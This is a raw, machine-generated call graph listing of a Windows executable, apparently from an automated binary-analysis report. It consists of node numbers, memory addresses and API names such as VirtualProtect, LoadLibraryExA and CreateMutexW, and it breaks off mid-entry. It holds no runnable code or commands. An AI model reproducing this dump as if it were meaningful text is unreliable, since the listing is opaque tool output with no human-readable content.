7ff73ae7ccde wcsxfrm __ExceptionPtrDestroy 75566->75568 75576 7ff73ae7de50 15 API calls 2 library calls 75566->75576 75568->75563 75568->75569 75577 7ff73ae7d5c0 15 API calls __ExceptionPtrDestroy 75568->75577 75569->75561 75578 7ff73ae7d720 15 API calls 3 library calls 75569->75578 75572 7ff73ae78d45 75570->75572 75579 7ff73ae88b40 75570->75579 75571 7ff73ae78d64 75571->75566 75572->75571 75588 7ff73ae70690 15 API calls 2 library calls 75572->75588 75575->75555 75576->75568 75577->75568 75578->75569 75580 7ff73ae88b60 75579->75580 75581 7ff73ae88b73 75579->75581 75589 7ff73ae8ca40 75580->75589 75583 7ff73ae88b7b 75581->75583 75584 7ff73ae88b8e 75581->75584 75599 7ff73ae8c230 75583->75599 75585 7ff73ae88b6f 75584->75585 75603 7ff73ae8d9e0 75584->75603 75585->75572 75588->75571 75590 7ff73ae8ca60 75589->75590 75594 7ff73ae8cb15 75589->75594 75591 7ff73ae8cad6 75590->75591 75596 7ff73ae8cb21 75590->75596 75611 7ff73ae88c90 GetLastError 75591->75611 75593 7ff73ae8cfc2 75593->75594 75617 7ff73ae8af30 GetLastError VirtualQuery VirtualFree SetLastError 75593->75617 75594->75585 75596->75593 75596->75594 75598 7ff73ae8d074 75596->75598 75598->75594 75618 7ff73ae8a720 GetLastError VirtualQuery VirtualFree SetLastError 75598->75618 75602 7ff73ae8c260 75599->75602 75601 7ff73ae8c2e0 75601->75585 75602->75601 75619 7ff73ae8a3f0 75602->75619 75604 7ff73ae8da01 75603->75604 75605 7ff73ae8da0d 75603->75605 75604->75585 75606 7ff73ae8dab6 75605->75606 75607 7ff73ae8ca40 4 API calls 75605->75607 75606->75604 75608 7ff73ae8c230 6 API calls 75606->75608 75607->75606 75609 7ff73ae8dcff memcpy_s 75608->75609 75609->75604 75610 7ff73ae8ca40 4 API calls 75609->75610 75610->75604 75616 7ff73ae88cb2 75611->75616 75612 7ff73ae88d65 SetLastError 75614 7ff73ae88cd9 75612->75614 75613 7ff73ae88cbe VirtualQuery 75613->75614 75613->75616 75614->75594 75615 7ff73ae88d18 VirtualFree 75615->75614 75615->75616 75616->75612 75616->75613 75616->75614 75616->75615 75617->75594 75618->75594 75620 7ff73ae8a421 75619->75620 75621 7ff73ae8a436 75619->75621 75625 7ff73ae88e60 75620->75625 75624 7ff73ae8a443 75621->75624 75629 7ff73ae88bb0 GetLastError VirtualAlloc SetLastError 75621->75629 75624->75601 75626 7ff73ae88e94 75625->75626 75628 7ff73ae88e9e 75625->75628 75631 7ff73ae88c20 GetLastError VirtualAlloc SetLastError 75626->75631 75628->75621 75630 7ff73ae88bf3 75629->75630 75630->75624 75632 7ff73ae88c63 75631->75632 75632->75628 75633 7ff73aea7930 75638 7ff73ae6fb80 15 API calls 5 library calls 75633->75638 75635 7ff73aea794e 75639 7ff73af355c4 75635->75639 75637 7ff73aea795d 75638->75635 75667 7ff73af11ab8 75639->75667 75642 7ff73af356ea 75676 7ff73af38b34 9 API calls ExFilterRethrow 75642->75676 75643 7ff73af35608 75645 7ff73af3560d 75643->75645 75646 7ff73af3562b 75643->75646 75648 7ff73af35621 75645->75648 75670 7ff73af40d88 31 API calls 4 library calls 75645->75670 75646->75648 75671 7ff73af2aef8 75646->75671 75675 7ff73af39294 14 API calls 2 library calls 75648->75675 75653 7ff73af35699 _handle_error 75653->75637 75654 7ff73af2aef8 _get_daylight 14 API calls 75655 7ff73af35657 75654->75655 75656 7ff73af3567c 75655->75656 75657 7ff73af35673 75655->75657 75659 7ff73af2aef8 _get_daylight 14 API calls 75656->75659 75658 7ff73af2aef8 _get_daylight 14 API calls 75657->75658 75658->75648 75660 7ff73af35681 75659->75660 75661 7ff73af3569e 75660->75661 75663 7ff73af2aef8 _get_daylight 14 API calls 75660->75663 75662 7ff73af2aef8 _get_daylight 14 API calls 75661->75662 75662->75648 75664 7ff73af3568b 75663->75664 75664->75661 75665 7ff73af35690 75664->75665 75674 7ff73af39294 14 API calls 2 library calls 75665->75674 75677 7ff73af11748 75667->75677 75669 7ff73af11ad2 75669->75642 75669->75643 75670->75648 75710 7ff73af3ab1c GetLastError 75671->75710 75673 7ff73af2af01 75673->75654 75674->75653 75675->75653 75709 7ff73af391ac EnterCriticalSection 75677->75709 75679 7ff73af1177c 75681 7ff73af2aef8 _get_daylight 14 API calls 75679->75681 75680 7ff73af11774 75680->75679 75683 7ff73af1179f 75680->75683 75682 7ff73af11781 75681->75682 75684 7ff73af38b14 _invalid_parameter_noinfo 23 API calls 75682->75684 75685 7ff73af1189c 41 API calls 75683->75685 75686 7ff73af1178d 75684->75686 75689 7ff73af117a7 ExFilterRethrow 75685->75689 75687 7ff73af39200 _isindst LeaveCriticalSection 75686->75687 75688 7ff73af11807 75687->75688 75688->75669 75689->75686 75690 7ff73af117e3 75689->75690 75691 7ff73af117d3 75689->75691 75693 7ff73af38840 __std_exception_copy 23 API calls 75690->75693 75692 7ff73af2aef8 _get_daylight 14 API calls 75691->75692 75692->75686 75694 7ff73af117f1 75693->75694 75694->75686 75695 7ff73af11824 75694->75695 75696 7ff73af38b34 _isindst 9 API calls 75695->75696 75697 7ff73af11838 _vswprintf 75696->75697 75698 7ff73af1184a 75697->75698 75702 7ff73af11874 75697->75702 75699 7ff73af2aef8 _get_daylight 14 API calls 75698->75699 75700 7ff73af1184f 75699->75700 75701 7ff73af38b14 _invalid_parameter_noinfo 23 API calls 75700->75701 75703 7ff73af1185a 75701->75703 75704 7ff73af391ac _isindst EnterCriticalSection 75702->75704 75703->75669 75705 7ff73af1187e 75704->75705 75706 7ff73af1189c 41 API calls 75705->75706 75707 7ff73af11887 75706->75707 75708 7ff73af39200 _isindst LeaveCriticalSection 75707->75708 75708->75703 75711 7ff73af3ab3e 75710->75711 75712 7ff73af3ab43 75710->75712 75733 7ff73af397e0 6 API calls try_get_function 75711->75733 75716 7ff73af3ab4b SetLastError 75712->75716 75734 7ff73af39828 6 API calls try_get_function 75712->75734 75715 7ff73af3ab66 75715->75716 75735 7ff73af3921c 75715->75735 75716->75673 75720 7ff73af3ab97 75744 7ff73af39828 6 API calls try_get_function 75720->75744 75721 7ff73af3ab87 75742 7ff73af39828 6 API calls try_get_function 75721->75742 75724 7ff73af3ab9f 75726 7ff73af3abb5 75724->75726 75727 7ff73af3aba3 75724->75727 75725 7ff73af3ab8e 75743 7ff73af39294 14 API calls 2 library calls 75725->75743 75746 7ff73af3a750 14 API calls _get_daylight 75726->75746 75745 7ff73af39828 6 API calls try_get_function 75727->75745 75731 7ff73af3abbd 75747 7ff73af39294 14 API calls 2 library calls 75731->75747 75734->75715 75740 7ff73af3922d wcsftime 75735->75740 75736 7ff73af3927e 75739 7ff73af2aef8 _get_daylight 13 API calls 75736->75739 75737 7ff73af39262 RtlAllocateHeap 75738 7ff73af3927c 75737->75738 75737->75740 75738->75720 75738->75721 75739->75738 75740->75736 75740->75737 75748 7ff73af4addc EnterCriticalSection LeaveCriticalSection wcsftime 75740->75748 75742->75725 75743->75716 75744->75724 75745->75725 75746->75731 75747->75716 75748->75740 75749 7ff73ae856dc 75760 7ff73aecb100 75749->75760 75753 7ff73ae8597e 75754 7ff73ae8583b 75754->75753 75768 7ff73aedee70 15 API calls 2 library calls 75754->75768 75756 7ff73ae8589d 75756->75753 75769 7ff73ae7b7a0 75756->75769 75758 7ff73ae858e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 75778 7ff73aedf070 73 API calls _wcsupr_s 75758->75778 75779 7ff73aebab10 75760->75779 75762 7ff73aecb138 75763 7ff73aebab10 16 API calls 75762->75763 75764 7ff73ae85725 75763->75764 75765 7ff73aebaa90 75764->75765 75766 7ff73aebaee0 16 API calls 75765->75766 75767 7ff73aebaabe 75766->75767 75767->75754 75768->75756 75770 7ff73ae7b9a5 75769->75770 75776 7ff73ae7b7d8 type_info::_name_internal_method 75769->75776 75777 7ff73ae7b8f6 75770->75777 75812 7ff73ae70950 15 API calls strrchr 75770->75812 75772 7ff73ae7b980 75806 7ff73ae7c060 75772->75806 75773 7ff73ae7b966 75811 7ff73ae7be30 15 API calls type_info::_name_internal_method 75773->75811 75776->75772 75776->75773 75776->75777 75777->75758 75778->75753 75780 7ff73aebab81 75779->75780 75781 7ff73aebab2a 75779->75781 75784 7ff73aebabd2 75780->75784 75787 7ff73aebabbc 75780->75787 75782 7ff73aebab4e 75781->75782 75783 7ff73aebab3d 75781->75783 75801 7ff73aebade0 VirtualProtect 75782->75801 75795 7ff73aebaee0 75783->75795 75788 7ff73aebab4c 75784->75788 75791 7ff73aebade0 VirtualProtect 75784->75791 75790 7ff73aebaee0 16 API calls 75787->75790 75788->75762 75790->75788 75793 7ff73aebac1f 75791->75793 75793->75788 75804 7ff73aebae40 15 API calls 2 library calls 75793->75804 75796 7ff73aebaefe 75795->75796 75799 7ff73aebaf2e 75795->75799 75797 7ff73aebade0 VirtualProtect 75796->75797 75798 7ff73aebaf20 75797->75798 75798->75799 75805 7ff73aebae40 15 API calls 2 library calls 75798->75805 75799->75788 75802 7ff73aebab67 75801->75802 75802->75788 75803 7ff73aebae40 15 API calls 2 library calls 75802->75803 75803->75788 75804->75788 75805->75799 75807 7ff73ae78d00 _free_nolock 15 API calls 75806->75807 75808 7ff73ae7c09a Concurrency::details::_UnrealizedChore::_CancelViaToken memcpy_s 75807->75808 75809 7ff73ae7c285 75808->75809 75813 7ff73ae7b310 15 API calls 3 library calls 75808->75813 75809->75777 75811->75777 75812->75777 75813->75809 75814 7ff73ae62c6e 75815 7ff73ae62e9e 75814->75815 75816 7ff73ae62ca4 75814->75816 75899 7ff73ae6aca0 75815->75899 75839 7ff73aeaf900 75816->75839 75851 7ff73aeb0300 75816->75851 75855 7ff73aeb1750 75816->75855 75860 7ff73ae66950 75816->75860 75818 7ff73ae62cb0 75823 7ff73ae62dd7 75818->75823 75826 7ff73ae62d98 75818->75826 75829 7ff73ae6273d 75818->75829 75832 7ff73ae63098 75818->75832 75821 7ff73ae64978 75923 7ff73aeb70e0 17 API calls 75821->75923 75824 7ff73ae64ac4 75825 7ff73ae65066 75826->75823 75827 7ff73ae6aca0 _free_nolock 15 API calls 75826->75827 75827->75826 75828 7ff73ae6aca0 _free_nolock 15 API calls 75828->75832 75829->75829 75829->75832 75834 7ff73ae6aca0 _free_nolock 15 API calls 75829->75834 75921 7ff73ae62420 17 API calls 2 library calls 75829->75921 75922 7ff73aea1b70 15 API calls 2 library calls 75829->75922 75831 7ff73ae64941 75832->75821 75832->75828 75832->75831 75834->75829 75840 7ff73aeaf913 __ExceptionPtrDestroy 75839->75840 75924 7ff73aeaedf0 75840->75924 75844 7ff73aeaf97f 75844->75818 75845 7ff73aeaf94f __ExceptionPtrDestroy 75845->75844 75846 7ff73aeafa1b 75845->75846 75938 7ff73ae82250 15 API calls 2 library calls 75845->75938 75940 7ff73aeaf5c0 96 API calls 4 library calls 75846->75940 75849 7ff73aeafa05 75849->75846 75939 7ff73ae70fa0 15 API calls 2 library calls 75849->75939 75852 7ff73aeb0377 75851->75852 75853 7ff73aeb0327 75851->75853 75852->75818 75853->75852 75976 7ff73aeeee10 75853->75976 75985 7ff73aeb5910 75855->75985 75861 7ff73ae6698b 75860->75861 75862 7ff73ae669a5 75861->75862 75864 7ff73ae669bd 75861->75864 76065 7ff73ae651e0 59 API calls _wcsupr_s 75862->76065 75865 7ff73ae669ed 75864->75865 76066 7ff73ae6cb50 15 API calls _free_nolock 75864->76066 76011 7ff73ae78020 75865->76011 75867 7ff73ae669d7 76067 7ff73ae6d5e0 75867->76067 75870 7ff73ae66a06 76024 7ff73ae65690 75870->76024 75873 7ff73ae66a4d 75875 7ff73ae66a77 75873->75875 75886 7ff73ae669aa 75873->75886 76076 7ff73ae65500 57 API calls _wcsupr_s 75873->76076 76032 7ff73ae666b0 75875->76032 75879 7ff73ae66ace 75881 7ff73ae66af0 75879->75881 75884 7ff73ae66b06 _wcsupr_s 75879->75884 75879->75886 76077 7ff73ae65530 72 API calls 2 library calls 75881->76077 75883 7ff73ae66afa 76078 7ff73ae65c10 98 API calls 2 library calls 75883->76078 75884->75886 76079 7ff73af2a1fc 75884->76079 75886->75818 75891 7ff73ae66b39 76093 7ff73ae65500 57 API calls _wcsupr_s 75891->76093 75892 7ff73ae66b54 76096 7ff73ae65740 117 API calls _wcsupr_s 75892->76096 75895 7ff73ae66b3e 76094 7ff73ae65530 72 API calls 2 library calls 75895->76094 75897 7ff73ae66b48 76095 7ff73ae65c10 98 API calls 2 library calls 75897->76095 75900 7ff73ae6acbb 75899->75900 75902 7ff73ae6acca 75899->75902 76715 7ff73ae70600 5 API calls _free_nolock 75900->76715 76712 7ff73ae6aed0 75902->76712 75905 7ff73ae62ed0 75907 7ff73ae730a0 75905->75907 75908 7ff73af2aef8 _get_daylight 14 API calls 75907->75908 75909 7ff73ae730b3 GetLastError 75908->75909 76717 7ff73ae73ca0 75909->76717 75912 7ff73ae73156 75915 7ff73ae7318d 75912->75915 76723 7ff73ae83fc0 75912->76723 75913 7ff73ae73132 76727 7ff73ae840a0 96 API calls _get_daylight 75913->76727 75917 7ff73ae7314f 75915->75917 76728 7ff73ae73a80 19 API calls _handle_error 75915->76728 75919 7ff73af2aef8 _get_daylight 14 API calls 75917->75919 75920 7ff73ae73294 SetLastError 75919->75920 75920->75824 75922->75829 75923->75825 75925 7ff73aeaee25 75924->75925 75926 7ff73aeaee4a 75925->75926 75941 7ff73ae71310 15 API calls __ExceptionPtrDestroy 75925->75941 75926->75845 75928 7ff73aeedc40 75926->75928 75929 7ff73aeedc70 75928->75929 75937 7ff73aeeddcc _handle_error _mbsncpy_s 75929->75937 75942 7ff73aeede50 75929->75942 75931 7ff73aeedd15 75963 7ff73ae65074 75931->75963 75933 7ff73aeedd4a 75934 7ff73aeedd81 75933->75934 75966 7ff73ae7d720 15 API calls 3 library calls 75933->75966 75967 7ff73aeee6e0 15 API calls memcpy_s 75934->75967 75937->75845 75938->75849 75939->75846 75940->75844 75941->75926 75943 7ff73aeedebb memcpy_s 75942->75943 75950 7ff73aeedf15 75943->75950 75968 7ff73aeeda60 15 API calls task 75943->75968 75946 7ff73aeee391 75974 7ff73aee0960 17 API calls memcpy_s 75946->75974 75947 7ff73aeee18f 75953 7ff73aeee212 75947->75953 75957 7ff73aeee1af 75947->75957 75969 7ff73ae71010 15 API calls std::rsfun 75947->75969 75948 7ff73aeee64c 75949 7ff73aeee665 75948->75949 75975 7ff73ae71010 15 API calls std::rsfun 75948->75975 75949->75931 75950->75947 75950->75948 75961 7ff73aeedf1c 75950->75961 75970 7ff73aeedac0 15 API calls 75953->75970 75956 7ff73aeee513 75956->75931 75958 7ff73aeee30d 75957->75958 75960 7ff73aeee2c8 75957->75960 75957->75961 75958->75961 75972 7ff73aeeda60 15 API calls task 75958->75972 75960->75961 75971 7ff73aeeda60 15 API calls task 75960->75971 75961->75946 75973 7ff73ae71010 15 API calls std::rsfun 75961->75973 75964 7ff73ae6508b 75963->75964 75964->75964 75965 7ff73ae650c2 CreateMutexW 75964->75965 75965->75933 75966->75934 75967->75937 75968->75950 75969->75953 75970->75957 75971->75961 75972->75961 75973->75946 75974->75956 75975->75949 75979 7ff73aeef080 75976->75979 75980 7ff73aeef0ed 75979->75980 75984 7ff73aeef094 75979->75984 75981 7ff73aeeee23 75980->75981 75982 7ff73aeef0f8 FreeLibrary 75980->75982 75981->75852 75982->75981 75983 7ff73aeef0cb FreeLibrary 75983->75984 75984->75981 75984->75983 75986 7ff73aeb598f _free_nolock 75985->75986 75989 7ff73aeb5945 75985->75989 75987 7ff73aeb1768 75986->75987 75997 7ff73ae71310 15 API calls __ExceptionPtrDestroy 75986->75997 75991 7ff73aeeeda0 75987->75991 75989->75986 75989->75987 75996 7ff73ae92a30 15 API calls type_info::_name_internal_method 75989->75996 75998 7ff73aeef000 GetLastError 75991->75998 75993 7ff73aeeedd3 76004 7ff73aeef340 15 API calls 2 library calls 75993->76004 75995 7ff73aeb17e7 75995->75818 75996->75986 75997->75987 76005 7ff73aeeefa0 75998->76005 76001 7ff73aeef05d SetLastError 76001->75993 76002 7ff73aeef047 76009 7ff73aeeee80 25 API calls 2 library calls 76002->76009 76004->75995 76006 7ff73aeeefb8 76005->76006 76007 7ff73aeeefd2 LoadLibraryExA 76006->76007 76010 7ff73ae93010 15 API calls strrchr 76006->76010 76007->76001 76007->76002 76009->76001 76010->76007 76017 7ff73ae78037 76011->76017 76012 7ff73ae7808d 76097 7ff73ae74b70 76012->76097 76016 7ff73ae78100 76108 7ff73ae6b4e0 76016->76108 76017->76012 76112 7ff73ae6ca10 76017->76112 76118 7ff73ae6c860 15 API calls 4 library calls 76017->76118 76119 7ff73ae6dce0 15 API calls strrchr 76017->76119 76019 7ff73ae6ca10 task 15 API calls 76021 7ff73ae780a9 76019->76021 76021->76016 76021->76019 76023 7ff73ae6d5e0 wcsxfrm 15 API calls 76021->76023 76022 7ff73ae7810f 76022->75870 76023->76021 76025 7ff73ae6d0c0 wcsxfrm 15 API calls 76024->76025 76029 7ff73ae656c5 76025->76029 76026 7ff73ae6571b 76028 7ff73ae6d5e0 wcsxfrm 15 API calls 76026->76028 76030 7ff73ae65731 76028->76030 76029->76026 76165 7ff73ae6c860 15 API calls 4 library calls 76029->76165 76166 7ff73ae6d7d0 15 API calls 3 library calls 76029->76166 76030->75873 76075 7ff73ae668d0 117 API calls 76030->76075 76033 7ff73ae666cd 76032->76033 76034 7ff73ae66872 76033->76034 76035 7ff73ae66722 76033->76035 76044 7ff73ae66746 76033->76044 76170 7ff73ae66230 75 API calls wcsxfrm 76034->76170 76036 7ff73ae6689e 76035->76036 76037 7ff73ae6672d 76035->76037 76171 7ff73ae662c0 75 API calls _free_nolock 76036->76171 76040 7ff73ae6674b 76037->76040 76041 7ff73ae66734 76037->76041 76167 7ff73ae657b0 98 API calls 2 library calls 76040->76167 76042 7ff73ae66816 76041->76042 76043 7ff73ae6673f 76041->76043 76169 7ff73ae660e0 75 API calls 3 library calls 76042->76169 76043->76044 76168 7ff73ae65840 77 API calls 2 library calls 76043->76168 76044->75879 76044->75886 76048 7ff73ae65d60 76044->76048 76049 7ff73ae65d96 76048->76049 76172 7ff73ae73f90 76049->76172 76055 7ff73ae65e01 wcsxfrm 76056 7ff73ae65e76 76055->76056 76057 7ff73ae65e15 wcsxfrm 76055->76057 76059 7ff73ae6b4e0 wcsxfrm 15 API calls 76056->76059 76062 7ff73ae65e49 76057->76062 76195 7ff73ae6cfa0 15 API calls 2 library calls 76057->76195 76064 7ff73ae65e58 wcsxfrm 76059->76064 76061 7ff73ae65e96 76196 7ff73ae65300 76061->76196 76063 7ff73ae6b4e0 wcsxfrm 15 API calls 76062->76063 76063->76064 76185 7ff73ae65430 76064->76185 76065->75886 76066->75867 76068 7ff73ae6d600 wcsxfrm strrchr 76067->76068 76069 7ff73ae7b7a0 type_info::_name_internal_method 15 API calls 76068->76069 76070 7ff73ae6d621 _free_nolock 76069->76070 76071 7ff73ae7f8b0 wcsxfrm 15 API calls 76070->76071 76072 7ff73ae6d647 wcsxfrm 76071->76072 76074 7ff73ae6d654 wcsxfrm 76072->76074 76709 7ff73ae62420 15 API calls strrchr 76072->76709 76074->75865 76075->75873 76076->75875 76077->75883 76078->75886 76080 7ff73af2a205 76079->76080 76084 7ff73ae66b2e 76079->76084 76081 7ff73af2aef8 _get_daylight 14 API calls 76080->76081 76082 7ff73af2a20a 76081->76082 76710 7ff73af38b14 23 API calls _invalid_parameter_noinfo 76082->76710 76085 7ff73af2a548 76084->76085 76086 7ff73af2a551 76085->76086 76088 7ff73af2a55e 76085->76088 76087 7ff73af2aef8 _get_daylight 14 API calls 76086->76087 76089 7ff73ae66b35 76087->76089 76088->76089 76090 7ff73af2aef8 _get_daylight 14 API calls 76088->76090 76089->75891 76089->75892 76091 7ff73af2a595 76090->76091 76711 7ff73af38b14 23 API calls _invalid_parameter_noinfo 76091->76711 76093->75895 76094->75897 76095->75886 76096->75886 76120 7ff73ae6b5f0 76097->76120 76099 7ff73ae6c7a0 15 API calls _free_nolock 76105 7ff73ae74b95 wcsxfrm strrchr _free_nolock 76099->76105 76100 7ff73ae6b4e0 wcsxfrm 15 API calls 76100->76105 76101 7ff73ae74ca8 76102 7ff73ae6b4e0 wcsxfrm 15 API calls 76101->76102 76103 7ff73ae74cb7 76102->76103 76103->76021 76105->76099 76105->76100 76105->76101 76105->76103 76106 7ff73ae6b5f0 wcsxfrm 15 API calls 76105->76106 76124 7ff73ae6d0c0 76105->76124 76130 7ff73ae6d4e0 15 API calls 2 library calls 76105->76130 76106->76105 76109 7ff73ae6b4f8 76108->76109 76110 7ff73ae6b563 76108->76110 76109->76110 76111 7ff73ae6aca0 _free_nolock 15 API calls 76109->76111 76110->76022 76110->76110 76111->76110 76113 7ff73ae6ca3f task _mbsncpy_s 76112->76113 76161 7ff73ae7ea50 76113->76161 76115 7ff73ae6ca64 wcsxfrm task 76116 7ff73ae6cb36 76115->76116 76164 7ff73ae6ad60 15 API calls _free_nolock 76115->76164 76116->76017 76118->76017 76119->76017 76121 7ff73ae6b60b wcsxfrm _free_nolock 76120->76121 76122 7ff73ae6b65b 76121->76122 76131 7ff73ae6ad60 15 API calls _free_nolock 76121->76131 76122->76105 76125 7ff73ae6d0ee _mbsncpy_s 76124->76125 76132 7ff73ae7c600 76125->76132 76127 7ff73ae6d10b _free_nolock 76129 7ff73ae6d15b 76127->76129 76136 7ff73ae6ad60 15 API calls _free_nolock 76127->76136 76129->76105 76130->76105 76131->76122 76133 7ff73ae7c619 __ExceptionPtrDestroy 76132->76133 76137 7ff73ae7c5a0 76133->76137 76135 7ff73ae7c67d 76135->76127 76136->76129 76140 7ff73ae7dff0 76137->76140 76139 7ff73ae7c5c5 wcsxfrm 76139->76135 76141 7ff73ae7e00d 76140->76141 76142 7ff73ae7e0cc 76140->76142 76141->76142 76144 7ff73ae7e023 76141->76144 76143 7ff73ae78da0 task 15 API calls 76142->76143 76145 7ff73ae7e0db 76143->76145 76153 7ff73ae78da0 76144->76153 76147 7ff73ae7e03c 76145->76147 76148 7ff73ae7e17d 76145->76148 76158 7ff73ae70950 15 API calls strrchr 76145->76158 76149 7ff73ae7e1c7 76147->76149 76159 7ff73ae7de50 15 API calls 2 library calls 76147->76159 76151 7ff73ae78d00 _free_nolock 15 API calls 76148->76151 76149->76139 76151->76147 76157 7ff73ae88b40 10 API calls 76153->76157 76154 7ff73ae78dd6 76155 7ff73ae78ded 76154->76155 76160 7ff73ae70690 15 API calls 2 library calls 76154->76160 76155->76147 76157->76154 76158->76148 76159->76149 76160->76155 76162 7ff73ae78da0 task 15 API calls 76161->76162 76163 7ff73ae7ea7b 76162->76163 76163->76115 76164->76116 76165->76029 76166->76029 76167->76044 76168->76044 76169->76044 76170->76044 76171->76044 76204 7ff73ae74050 76172->76204 76174 7ff73ae65dd4 76174->76061 76175 7ff73ae6cde0 76174->76175 76176 7ff73ae6ce00 wcsxfrm strrchr 76175->76176 76177 7ff73ae7b7a0 type_info::_name_internal_method 15 API calls 76176->76177 76178 7ff73ae6ce21 _free_nolock 76177->76178 76664 7ff73ae7f6e0 76178->76664 76180 7ff73ae6ce47 76182 7ff73ae6ce8a wcsxfrm 76180->76182 76671 7ff73ae62420 15 API calls strrchr 76180->76671 76183 7ff73ae6cf04 76182->76183 76672 7ff73ae6ad60 15 API calls _free_nolock 76182->76672 76183->76055 76186 7ff73ae6544c 76185->76186 76187 7ff73ae6ca10 task 15 API calls 76186->76187 76188 7ff73ae65468 wcsxfrm 76187->76188 76675 7ff73af2a97c 76188->76675 76193 7ff73af2a97c 17 API calls 76194 7ff73ae654c8 wcsxfrm 76193->76194 76194->76061 76195->76057 76197 7ff73ae6536b 76196->76197 76198 7ff73ae65314 wcsxfrm 76196->76198 76197->75879 76198->76197 76707 7ff73ae6c230 15 API calls 3 library calls 76198->76707 76200 7ff73ae65339 76708 7ff73ae65250 60 API calls _wcsupr_s 76200->76708 76202 7ff73ae6535c 76203 7ff73ae6b4e0 wcsxfrm 15 API calls 76202->76203 76203->76197 76205 7ff73ae74083 76204->76205 76208 7ff73ae740f5 _wcsupr_s 76204->76208 76232 7ff73af2b114 76205->76232 76251 7ff73ae73e80 76208->76251 76209 7ff73ae740d9 76277 7ff73ae6c990 15 API calls 2 library calls 76209->76277 76210 7ff73ae740a4 76211 7ff73af2aef8 _get_daylight 14 API calls 76210->76211 76214 7ff73ae740a9 76211->76214 76275 7ff73af2b448 23 API calls 4 library calls 76214->76275 76215 7ff73ae7413f 76257 7ff73af2b02c 76215->76257 76219 7ff73ae740b0 76276 7ff73ae6c990 15 API calls 2 library calls 76219->76276 76220 7ff73ae74155 76223 7ff73af2aef8 _get_daylight 14 API calls 76220->76223 76222 7ff73ae741e3 _wcsupr_s 76230 7ff73ae740cf _handle_error 76222->76230 76263 7ff73af2af9c 76222->76263 76225 7ff73ae7419e 76223->76225 76278 7ff73af2b448 23 API calls 4 library calls 76225->76278 76227 7ff73ae741a5 76279 7ff73ae6c990 15 API calls 2 library calls 76227->76279 76229 7ff73ae741c7 76229->76230 76231 7ff73af2af9c _wcsupr_s 57 API calls 76229->76231 76230->76174 76231->76230 76233 7ff73af2b058 76232->76233 76234 7ff73af2b075 76233->76234 76236 7ff73af2b0a1 76233->76236 76235 7ff73af2aef8 _get_daylight 14 API calls 76234->76235 76237 7ff73af2b07a 76235->76237 76238 7ff73af2b0a6 76236->76238 76239 7ff73af2b0b3 76236->76239 76292 7ff73af38b14 23 API calls _invalid_parameter_noinfo 76237->76292 76241 7ff73af2aef8 _get_daylight 14 API calls 76238->76241 76280 7ff73af3d698 76239->76280 76243 7ff73ae74097 76241->76243 76243->76209 76243->76210 76245 7ff73af2b0c7 76247 7ff73af2aef8 _get_daylight 14 API calls 76245->76247 76246 7ff73af2b0d4 76287 7ff73af3dabc 76246->76287 76247->76243 76249 7ff73af2b0e8 tmpfile 76293 7ff73af11c84 LeaveCriticalSection 76249->76293 76252 7ff73ae73ec6 _mbsncpy_s 76251->76252 76413 7ff73ae63037 76252->76413 76256 7ff73ae73f41 _mbsncpy_s 76256->76215 76258 7ff73af2b035 76257->76258 76262 7ff73ae7414d 76257->76262 76259 7ff73af2aef8 _get_daylight 14 API calls 76258->76259 76260 7ff73af2b03a 76259->76260 76661 7ff73af38b14 23 API calls _invalid_parameter_noinfo 76260->76661 76262->76220 76262->76222 76264 7ff73af2afb3 76263->76264 76266 7ff73af2afd1 76263->76266 76265 7ff73af2aef8 _get_daylight 14 API calls 76264->76265 76267 7ff73af2afb8 76265->76267 76273 7ff73af2afc3 tmpfile 76266->76273 76662 7ff73af11c78 EnterCriticalSection 76266->76662 76663 7ff73af38b14 23 API calls _invalid_parameter_noinfo 76267->76663 76270 7ff73af2afe7 76271 7ff73af2af18 _wcsupr_s 55 API calls 76270->76271 76272 7ff73af2aff0 76271->76272 76274 7ff73af11c84 _fread_nolock LeaveCriticalSection 76272->76274 76273->76230 76274->76273 76275->76219 76276->76230 76277->76208 76278->76227 76279->76229 76294 7ff73af391ac EnterCriticalSection 76280->76294 76282 7ff73af3d6af 76283 7ff73af3d70c tmpfile 17 API calls 76282->76283 76284 7ff73af3d6ba 76283->76284 76285 7ff73af39200 _isindst LeaveCriticalSection 76284->76285 76286 7ff73af2b0bd 76285->76286 76286->76245 76286->76246 76295 7ff73af3d7f8 76287->76295 76291 7ff73af3db16 76291->76249 76292->76243 76300 7ff73af3d822 _wcsupr_s 76295->76300 76296 7ff73af2aef8 _get_daylight 14 API calls 76297 7ff73af3da9b 76296->76297 76313 7ff73af38b14 23 API calls _invalid_parameter_noinfo 76297->76313 76299 7ff73af3d9de 76299->76291 76307 7ff73af41dd8 76299->76307 76305 7ff73af3d9d5 76300->76305 76310 7ff73af4b0e4 26 API calls 3 library calls 76300->76310 76302 7ff73af3da36 76302->76305 76311 7ff73af4b0e4 26 API calls 3 library calls 76302->76311 76304 7ff73af3da57 76304->76305 76312 7ff73af4b0e4 26 API calls 3 library calls 76304->76312 76305->76296 76305->76299 76314 7ff73af41698 76307->76314 76310->76302 76311->76304 76312->76305 76313->76299 76315 7ff73af416cd 76314->76315 76316 7ff73af416af 76314->76316 76315->76316 76319 7ff73af416e9 76315->76319 76317 7ff73af2aef8 _get_daylight 14 API calls 76316->76317 76318 7ff73af416b4 76317->76318 76336 7ff73af38b14 23 API calls _invalid_parameter_noinfo 76318->76336 76325 7ff73af41cc0 76319->76325 76323 7ff73af416c0 76323->76291 76338 7ff73af13ea8 76325->76338 76329 7ff73af41d23 76346 7ff73af34f28 76329->76346 76332 7ff73af41d7b 76334 7ff73af41714 76332->76334 76412 7ff73af39294 14 API calls 2 library calls 76332->76412 76334->76323 76337 7ff73af47978 LeaveCriticalSection 76334->76337 76336->76323 76339 7ff73af13ecc 76338->76339 76345 7ff73af13ec7 76338->76345 76340 7ff73af3a9a0 TranslateName 26 API calls 76339->76340 76339->76345 76341 7ff73af13ee7 76340->76341 76342 7ff73af3ac48 TranslateName 26 API calls 76341->76342 76343 7ff73af13f0a 76342->76343 76344 7ff73af3ac7c TranslateName 26 API calls 76343->76344 76344->76345 76345->76329 76411 7ff73af395a0 5 API calls try_get_function 76345->76411 76347 7ff73af34f51 76346->76347 76348 7ff73af34f73 76346->76348 76352 7ff73af39294 __free_lconv_mon 14 API calls 76347->76352 76353 7ff73af34f5f 76347->76353 76349 7ff73af34f77 76348->76349 76350 7ff73af34fcc 76348->76350 76349->76353 76355 7ff73af39294 __free_lconv_mon 14 API calls 76349->76355 76360 7ff73af34f8b 76349->76360 76351 7ff73af42ff4 wcsftime MultiByteToWideChar 76350->76351 76358 7ff73af34fe7 76351->76358 76352->76353 76353->76332 76368 